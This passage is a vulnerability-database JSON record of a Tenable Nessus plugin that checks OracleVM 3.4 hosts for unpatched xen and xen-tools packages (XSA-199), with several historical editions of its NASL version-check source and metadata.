{"id": "ORACLEVM_OVMSA-2016-0173.NASL", "bulletinFamily": "scanner", "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]", "published": "2016-12-08T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/95620", "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?6104821f"], "cvelist": [], "type": "nessus", "lastseen": "2019-12-13T08:50:10", "history": [{"lastseen": "2019-11-01T03:18:52", "edition": 9, "differentElements": ["modified"], "bulletin": {"lastseen": "2019-11-01T03:18:52", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 9, "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"modified": "2019-11-01T03:18:52", "vector": "NONE", "value": 3.4}, "dependencies": {"references": [{"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3607.NASL"], "type": "nessus"}], "modified": "2019-11-01T03:18:52"}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2019-11-02T00:00:00", "href": "https://www.tenable.com/plugins/nessus/95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "bbab0c647b2f01faf2a161133a12fdd7", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "dc233597f3760b02c8ddebc69eee649e", "key": "description"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "64c3c860632671783599c242de75d407", "key": "href"}, {"hash": "b7beaf9d124542f914ef08e608facdab", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "b05be2ec4e62470dadaab06de0d7bcdba22de56399e1d54d245d206036e00600"}}, {"lastseen": "2018-11-20T07:41:11", "edition": 5, "differentElements": ["description"], "bulletin": {"lastseen": "2018-11-20T07:41:11", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 5, "reporter": "Tenable", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2018-11-19T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/11/19 16:36:34\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "9e33ebe844d7e88ee97bfa9301de7569", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5d271ede8106ea079ca87703966309c1", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "5e9c28fb71a885719f4f0312b51c7b38", "key": "modified"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8037f56d4d98ec6b5e687bc34cd58867", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "1b3c699b03faf6497872a733844e5813ffc71892a22b8bd72ab5f087a4ed0ef6"}}, {"lastseen": "2019-02-21T01:28:40", "edition": 7, "differentElements": ["description", "reporter", "modified", "sourceData", "href"], "bulletin": {"lastseen": "2019-02-21T01:28:40", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 7, "reporter": "Tenable", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"modified": "2019-02-21T01:28:40", "vector": "NONE", "value": 3.5}, "dependencies": {"references": [{"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3607.NASL"], "type": "nessus"}], "modified": "2019-02-21T01:28:40"}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2018-11-19T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2018/11/19 16:36:34\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(rpm:\"xen-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_exists(rpm:\"xen-tools-4.4.4-105\", release:\"OVS3.4\") && rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "9e33ebe844d7e88ee97bfa9301de7569", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5d271ede8106ea079ca87703966309c1", "key": "sourceData"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "5e9c28fb71a885719f4f0312b51c7b38", "key": "modified"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8037f56d4d98ec6b5e687bc34cd58867", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}, {"hash": "8b9f10f18591da16417a9436b16c9610", "key": "cpe"}], "hash": "1b3c699b03faf6497872a733844e5813ffc71892a22b8bd72ab5f087a4ed0ef6"}}, {"lastseen": "2016-12-08T21:39:26", "edition": 1, "differentElements": ["sourceData"], "bulletin": {"lastseen": "2016-12-08T21:39:26", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 1, "reporter": "Tenable", "history": [], "published": "2016-12-08T00:00:00", "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.2", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-12-08T00:00:00", "href": "https://www.tenable.com/plugins/index.php?view=single&id=95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2016/12/08 14:28:00 $\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:oracle:vm:3.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"xen-4.4.4-105.0.2.1.el6\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"xen-tools-4.4.4-105.0.2.1.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-tools\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "9e33ebe844d7e88ee97bfa9301de7569", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "63d4fd9a95be526174d65f5ab80055d7", "key": "naslFamily"}, {"hash": "0c70f99fb718b8ef3906a2e2ecfddb58", "key": "references"}, {"hash": "77d8b92f7e4ad09337545800164f0737", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8037f56d4d98ec6b5e687bc34cd58867", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "published"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f9bdb390f81adf9057882e27cce0b598", "key": "sourceData"}, {"hash": "fd6fdbbbebbdde2720bb46b1e0cf6af8", "key": "title"}], "hash": "16dc592be182dc64c973024a2a62e614c8deead455447e42cb26961761578d4b"}}, {"lastseen": "2019-10-28T21:06:17", "edition": 8, "differentElements": ["modified"], "bulletin": {"lastseen": "2019-10-28T21:06:17", "references": ["http://www.nessus.org/u?6104821f"], "pluginID": "95620", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]", "edition": 8, "reporter": "This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "history": [], "published": "2016-12-08T00:00:00", "enchantments": {"score": {"modified": "2019-10-28T21:06:17", "vector": "NONE", "value": 3.1}, "dependencies": {"references": [{"idList": ["MSF:EXPLOIT/UNIX/WEBAPP/SUGARCRM_REST_UNSERIALIZE_EXEC"], "type": "metasploit"}, {"idList": ["ELSA-2017-3658", "ELSA-2017-3657", "ELSA-2017-3636", "ELSA-2018-4021", "ELSA-2017-3637"], "type": "oraclelinux"}, {"idList": ["CVE-2016-9685", "CVE-2016-10044"], "type": "cve"}, {"idList": ["ORACLELINUX_ELSA-2017-3658.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLELINUX_ELSA-2017-3657.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2017-0173.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3607.NASL", "ORACLEVM_OVMSA-2017-0144.NASL"], "type": "nessus"}], "modified": "2019-10-28T21:06:17"}}, "title": "OracleVM 3.4 : xen (OVMSA-2016-0173)", "type": "nessus", "objectVersion": "1.3", "naslFamily": "OracleVM Local Security Checks", "bulletinFamily": "scanner", "cvelist": [], "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "modified": "2019-10-02T00:00:00", "href": "https://www.tenable.com/plugins/nessus/95620", "id": "ORACLEVM_OVMSA-2016-0173.NASL", "viewCount": 1, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0173.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95620);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_name(english:\"OracleVM 3.4 : xen (OVMSA-2016-0173)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - qemu: ioport_read, ioport_write: be defensive about\n 32-bit addresses master XSA-199 [OraBug: 25119498]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-December/000597.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6104821f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xen / xen-tools packages.\"\n 